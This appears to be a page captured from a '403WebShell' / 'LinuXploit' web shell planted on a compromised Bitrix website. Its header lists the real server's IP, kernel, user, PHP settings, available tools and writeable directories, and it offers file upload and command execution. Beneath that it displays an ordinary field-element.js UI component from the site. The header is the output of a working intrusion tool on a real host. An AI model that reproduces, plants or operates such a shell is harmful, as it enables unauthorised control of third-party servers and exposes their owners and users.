%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.15.29.146
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/js/landing/ui/panel/formsettingspanel/content/fields-rules/src/internal/field-element/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/js/landing/ui/panel/formsettingspanel/content/fields-rules/src/internal/field-element//field-element.js
import {EventEmitter} from 'main.core.events';
import {Cache, Tag, Text} from 'main.core';
import {IconButton} from 'landing.ui.component.iconbutton';
import {fetchEventsFromOptions} from 'landing.ui.component.internal';
import type {FormDictionary} from 'crm.form.type';
import type {CrmField} from '../../types';

import './css/style.css';

type FieldElementOptions = {
	id: string,
	title: string,
	removable?: boolean,
	draggable?: boolean,
	actionsLabel?: string,
	actionsList?: Array<{name: string, value: any}>,
	actionsValue?: any,
	onRemove?: () => void,
	// eslint-disable-next-line no-use-before-define
	color?: $Values<typeof FieldElement.Colors>,
	dictionary: FormDictionary,
	fields: CrmField,
};

const defaultOptions = {
	removable: true,
	draggable: false,
	// eslint-disable-next-line no-use-before-define
	color: 'blue',
};

export class FieldElement extends EventEmitter
{
	static Colors = {
		blue: 'blue',
		green: 'green',
		red: 'red',
	};

	constructor(options: FieldElementOptions)
	{
		super();
		this.setEventNamespace('BX.Landing.UI.Field.RuleField.FieldElement');
		this.subscribeFromOptions(fetchEventsFromOptions(options));
		this.options = {...defaultOptions, ...options};
		this.cache = new Cache.MemoryCache();
	}

	getDragButtonLayout(): HTMLDivElement
	{
		return this.cache.remember('dragButton', () => {
			const button = new IconButton({
				type: IconButton.Types.drag,
				style: {
					width: '20px',
				},
			});

			return button.getLayout();
		});
	}

	getActionsDropdown(): BX.Landing.UI.Field.DropdownInline
	{
		return this.cache.remember('actionsDropdown', () => {
			const field = new window.top.BX.Landing.UI.Field.DropdownInline({
				title: this.options.actionsLabel,
				items: this.options.actionsList,
				content: this.options.actionsValue,
			});

			field.subscribe('onChange', () => {
				this.emit('onChange');
			});

			return field;
		});
	}

	getActionsLayout(): HTMLDivElement
	{
		return this.cache.remember('actionsLayout', () => {
			return Tag.render`
				<div class="landing-ui-field-element-text-action">
					${this.getActionsDropdown().getLayout()}
				</div>
			`;
		});
	}

	getTitleLayout(): HTMLDivElement
	{
		return this.cache.remember('titleLayout', () => {
			return Tag.render`<div class="landing-ui-field-element-text-title">${Text.encode(this.options.title)}</div>`;
		});
	}

	getRemoveButtonLayout(): HTMLDivElement
	{
		return this.cache.remember('removeButton', () => {
			const button = new IconButton({
				type: IconButton.Types.remove,
				onClick: () => this.emit('onRemove'),
				iconSize: '9px',
				style: {
					width: '20px',
					marginLeft: 'auto',
				},
			});

			return button.getLayout();
		});
	}

	getLayout(): HTMLDivElement
	{
		return this.cache.remember('layout', () => {
			return Tag.render`
				<div
					class="landing-ui-field-element-${this.options.color}"
					data-field-id="${Text.encode(this.options.id)}"
				>
					${this.options.draggable ? this.getDragButtonLayout() : ''}
					<div class="landing-ui-field-element-text">
						${this.options.actionsLabel ? this.getActionsLayout() : ''}
						${this.getTitleLayout()}
					</div>
					${this.options.removable ? this.getRemoveButtonLayout() : ''}
				</div>
			`;
		});
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit